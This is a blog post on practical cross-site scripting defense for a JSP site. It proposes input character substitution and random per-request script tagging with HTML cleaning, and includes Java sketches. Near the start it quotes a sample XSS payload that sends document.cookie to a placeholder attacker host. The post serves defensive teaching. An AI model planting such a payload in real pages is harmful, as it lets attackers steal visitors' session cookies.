Saturday, October 2, 2010

Practical XSS defense

This blog has been quiet lately.  I've been working on the nuts and bolts of what we[1] hope will eventually be a major web site, and that hasn't lent itself to the sort of material I want here.  I'm trying to post only when I have something at least mildly novel and meaty to talk about -- as opposed to, say, photos from my three-day trip to the land of Tomcat configuration.  We're starting to get past the boilerplate into more interesting work, so I hope to start posting more often again.

One thing I set out to tackle this week is XSS defense.  Traditionally, it's a tedious and error-prone task.  In this post, I'll present an attempt to improve on this.

Wikipedia provides a good introduction to the subject.  As a brief refresher, XSS (Cross-Site Scripting) is an attack where a malicious user enters deliberately malformed data into your system.  If your site is not properly protected, it may display that data on a web page in such a way that the browser interprets it as JavaScript code, allowing the attacker to take control of the browser of any victim who views the page.
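
To make that concrete: suppose your site echoes a user-supplied comment into the page verbatim.  An attacker can submit something like this as their "comment" (the URL is hypothetical):

  <script>
    document.location = 'http://evil.example/steal?c=' + document.cookie;
  </script>

Any victim who views the page runs the attacker's script -- which, in this case, ships the victim's cookies off to the attacker's server.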

Escaping

There are a variety of defenses against XSS.  The most common is escaping -- transforming the data in such a way that the browser will not interpret it as code.  For instance, when including a user-supplied value in a web page, characters like "<" and "&" should be rewritten as HTML entities -- "&lt;" and "&amp;".  Old hat, probably, to most of you reading this.

Escaping, if done correctly, is a solid defense against XSS.  However, getting it right is notoriously difficult.  You must apply the escaping in every single place where your code inserts user-supplied data into a web page.  That can easily be thousands of locations.  Miss a single one, and your site is vulnerable.  It's sometimes necessary to perform the encoding at different levels in the code, making it hard to keep track of which strings have already been encoded.  Worse yet, different sorts of encoding are needed depending on context: HTML entity encoding, URL encoding, backslash encoding, etc.  I've even seen cases where two levels of encoding were needed -- for instance, when a value is included in a JavaScript string literal, and the JavaScript code later places that string in the innerHTML of some DOM node.  If you get the encoding wrong, you may again be vulnerable.
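
To make the double-encoding case concrete, here's a sketch (the Escaper helpers are hypothetical names, in the spirit of the example below).  The value sits inside a JavaScript string literal, the outer context, so backslash encoding is applied last; it ultimately lands in the page as HTML, the inner context, so entity encoding is applied first:

  <script type="text/javascript">
    // The JS engine unescapes the string literal first; innerHTML then
    // interprets entities -- so the encodings must nest in that order.
    var bio = '<%= Escaper.jsStringEncode(Escaper.entityEncode(bio)) %>';
    document.getElementById('bio').innerHTML = bio;
  </script>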

Escaping also tends to uglify your code.  In JSP, <%= userName %> might have to become <%= Escaper.entityEncode(userName) %>.  The impact on code readability and maintainability is nontrivial.  Some templating systems handle this better than others; we're using plain ol' JSP, which offers no special support.  So, we weren't very enthusiastic about this approach.
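
For reference, a minimal sketch of such an escaper -- the class name comes from the example above, and the character list is the usual minimum rather than an exhaustive one:

  public final class Escaper {
      /** Rewrites HTML-significant characters as entities. */
      public static String entityEncode(String s) {
          StringBuilder out = new StringBuilder(s.length());
          for (int i = 0; i < s.length(); i++) {
              char c = s.charAt(i);
              switch (c) {
                  case '&':  out.append("&amp;");  break;
                  case '<':  out.append("&lt;");   break;
                  case '>':  out.append("&gt;");   break;
                  case '"':  out.append("&quot;"); break;
                  case '\'': out.append("&#39;");  break;
                  default:   out.append(c);
              }
          }
          return out.toString();
      }
  }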

Validation and filtering

Another well-known defense is to validate and/or filter your input: disallow users from entering special characters like <, or filter out those characters.  If these characters never enter your system, you don't have to worry about escaping them at output time.
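
In code, the two flavors might look something like this -- a sketch, with an illustrative pattern and character list rather than a vetted whitelist:

  import java.util.regex.Pattern;

  public final class InputFilter {
      private static final Pattern PHONE = Pattern.compile("[0-9+() -]{7,20}");

      // Validation: reject input that doesn't match the expected shape.
      public static boolean isValidPhone(String s) {
          return s != null && PHONE.matcher(s).matches();
      }

      // Filtering: silently drop characters we consider dangerous.
      public static String stripSpecials(String s) {
          return s.replaceAll("[<>&\"'\\\\]", "");
      }
  }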

Most web sites have fewer inputs than outputs, so airtight input filtering is easier to achieve than airtight output escaping.  Also, a single filter can render data safe for inclusion in a variety of contexts, unlike output escaping where you have to be careful to use the correct escaping mode according to context.  (Though this requires a broadminded definition of "special characters" -- see this link for a discussion.)

Input filtering does have some drawbacks.  Most notably, it is visible to users.  Some dangerous characters, like ' and &, appear frequently in ordinary situations, and users will be annoyed if they can't use them.  For this reason, filtering is most commonly used for specific data types, such as phone numbers, rather than free-form text such as a message subject.

Another drawback of input filtering is that, if you find a bug in your input filter, you have to re-validate all existing data.  That can be a huge burden in practice, especially if you're under time pressure to close a security hole.  With output escaping, as soon as you fix the bug and push a new build, you're protected.

Design criteria

We're building an actual web site; rubber is meeting road.  Theory aside, we need a concrete plan for XSS defense.  Ideally, the solution would satisfy the following criteria:
  • Easy to use -- no complex rules to be remembered while coding.
  • Minimal impact on code readability and maintainability.
  • Works with JSP (our current templating system), and portable to other templating systems.
  • Little or no user-visible impact.
  • Auditability -- it should be possible to scan the code with an automated tool and identify any possible XSS holes.
  • Defense in depth -- multiple, independent / redundant mechanisms preventing XSS exploits.
Also, I'd like a pony.  (Well, not really.  One of these, maybe.)  Output escaping fails on ease of use, and is difficult to audit; input filtering fails on user impact, and by itself does not provide defense in depth.  Time to get creative.

Input transformation

Again, one problem with input filtering is that it can cause serious annoyance to users.  As noted in one of the pages linked above, imagine poor Mr. O'Malley's frustration when he can't type the ' in his name.

What if, instead of forbidding dangerous characters, we replace them with safer substitutes?  The most common offender, the single quote, has very acceptable substitutes -- the curved single quotes, ‘ and ’.  When we process a form submission, we could perform this substitution automatically.  Mr. O'Malley might not even notice that he's now Mr. O’Malley, and if he did notice, he probably wouldn’t mind.

This appeals to me.  The main objection to input filtering is the impact on users, and this mitigates that impact.  The impact is not eliminated completely, so this won't work in all situations.  But in our application, it should be usable for almost all inputs.

The mapping I'm currently envisioning is as follows:

  '  ->  ‘ or ’ (depending on context)
  "  ->  “ or ” (depending on context)
  <  ->  (
  >  ->  )
  &  ->  +
  \  ->  /
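
Here's a sketch of the transformation; the quote-direction rule is my guess at "depending on context" (treat a quote that follows whitespace, or starts the field, as an opening quote).  The getSafe helper mentioned below simply wraps it around request parameters:

  import javax.servlet.http.HttpServletRequest;

  public final class XssUtil {
      public static String transform(String s) {
          StringBuilder out = new StringBuilder(s.length());
          for (int i = 0; i < s.length(); i++) {
              char c = s.charAt(i);
              boolean opening = (i == 0) || Character.isWhitespace(s.charAt(i - 1));
              switch (c) {
                  case '\'': out.append(opening ? '\u2018' : '\u2019'); break;  // ‘ or ’
                  case '"':  out.append(opening ? '\u201C' : '\u201D'); break;  // “ or ”
                  case '<':  out.append('('); break;
                  case '>':  out.append(')'); break;
                  case '&':  out.append('+'); break;
                  case '\\': out.append('/'); break;
                  default:   out.append(c);
              }
          }
          return out.toString();
      }

      // Transforming replacement for request.getParameter().
      public static String getSafe(HttpServletRequest request, String name) {
          String value = request.getParameter(name);
          return (value == null) ? null : transform(value);
      }
  }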

This isn't sufficient in every situation.  For instance, URLs need a different input transformation -- the mapping above will break some URLs, and doesn't rule out "javascript:" or other dangerous links.  And no reasonable input transformation will suffice if you include user-supplied values in an unquoted tag attribute -- quoting is essential.  But if you're good about quoting, this transformation suffices for most common situations.  And it scores pretty well on my "I want a pony" design criteria:
  • Ease of use: simply replace every instance of request.getParameter("name") with something like XssUtil.getSafe(request, "name").  (With exceptions only for those unusual cases where the transformation is not acceptable.)
  • Impact on code readability: the new form is not much bulkier than the old.
  • Template compatibility: input transformation has no impact on the templating system.
  • Auditability: it's easy to grep your codebase for unprotected calls to getParameter.
That leaves only user impact, which I've discussed; and defense in depth.  Defense in depth brings me to my next topic.

Script tagging

Most approaches to XSS defense involve enumerating, and protecting, every spot on a page where scripts might creep in.  The idea is for the page to be "clean" as it emerges from the templating system.  As we've seen above, that's difficult.

Instead, let's accept that a malicious script might sneak into the generated page.  If we have a whitelist of places where scripts are supposed to appear, we could filter out any unwanted ones.  This would work as follows:

1. Tag all "good" scripts -- scripts that we're deliberately including in the page -- with a special marker.  In JSP, the coding idiom might be something like this:

  <script type="text/javascript">
    <%= scriptToken() %>
    ...regular JavaScript code here...
  </script>

It's important that an attacker not be able to guess the special marker.  This is easily ensured by generating a random marker for each request.
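
Generating the marker is straightforward; here's one way (an assumption on my part -- any unguessable per-request value would do).  The token would be generated once per request, say in a servlet filter, and stashed as a request attribute so that scriptToken() in the template and the post-processing pass agree on its value:

  import java.math.BigInteger;
  import java.security.SecureRandom;

  public final class ScriptToken {
      private static final SecureRandom RANDOM = new SecureRandom();

      /** 128 bits of randomness, rendered as hex -- effectively unguessable. */
      public static String newToken() {
          return new BigInteger(128, RANDOM).toString(16);
      }
  }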

2. After the templating system executes, run the generated page through an HTML parser to identify all scripts on the page.  (For this to be robust, we'll actually need an HTML "cleaner" that rewrites the page in a way that all browsers can be trusted to parse properly.)  Here, "all scripts" means all constructs that could trigger undesired actions in the browser: <script> tags, <style> tags, onclick handlers, URLs with protocols other than http/https/mailto, etc.  Like any HTML cleaner, the system should be based on a whitelist -- any tag or attribute not in the whitelist is considered dangerous.

3. Whenever we see a script with the special marker, remove the marker and leave the script alone.  If we see any scripts without the marker, strip them out, and flag the page for manual inspection.
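
Here's a sketch of steps 2 and 3, using jsoup as a stand-in for the HTML cleaner and handling only <script> tags -- the real pass would also cover event handlers, style tags, URL protocols, and the rest of the whitelist:

  import org.jsoup.Jsoup;
  import org.jsoup.nodes.Document;
  import org.jsoup.nodes.Element;

  public final class ScriptFilter {
      /** Strips unmarked scripts from a generated page. */
      public static String filter(String html, String token) {
          Document doc = Jsoup.parse(html);
          for (Element script : doc.select("script")) {
              if (!script.data().contains(token)) {
                  // No marker: strip the script and flag the page.
                  reportSuspectScript(script.data());
                  script.remove();
              }
          }
          // The token is random per request, so a plain string replace
          // safely erases the markers from the surviving scripts.
          return doc.html().replace(token, "");
      }

      private static void reportSuspectScript(String body) {
          // Hypothetical hook for the manual inspection mentioned above.
          System.err.println("Unmarked script stripped: " + body);
      }
  }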

I don't recall seeing this approach suggested before, but at first blush it seems sound to me.  Of course, browsers are complicated beasts, and I may be missing something.  If you can poke a hole, please let me know!

This approach does impose processing overhead, to parse each generated page.  However, cycles are cheap nowadays; security holes are expensive, as is programmer time.  Also, the same processing pass can perform other useful functions, such as HTML minification.  How does the approach stack up on my design criteria?
  • Ease of use: pretty good.  It only requires adding a bit of boilerplate at the beginning of every script block; in practice, it might look something like <%= scriptToken() %>.
  • Code impact: the token is not a big deal for a script block.  It will be more annoying in something small like an onclick handler.
  • Template compatibility: inserting a token should be easy in any templating system.
  • User impact: none.
  • Auditability: excellent.  Runtime reporting of marker-less scripts makes the system self-auditing.
  • Defense in depth: this approach is completely independent of input transformation, so combining the two achieves a layered defense.  It could also be combined with traditional output escaping.

Conclusions

The combination of input transformation and script tagging yields a layered, auditable defense against XSS attacks, with less programming burden than traditional output escaping.  Output escaping will still be needed in a few places where input transformation is impractical, such as when embedding a user-supplied value in a URL.

If there is interest, I might take the time to open-source this code once it's completed.

Notes

[1] My old partners in crime from Writely, Sam Schillace and Claudia Carpenter
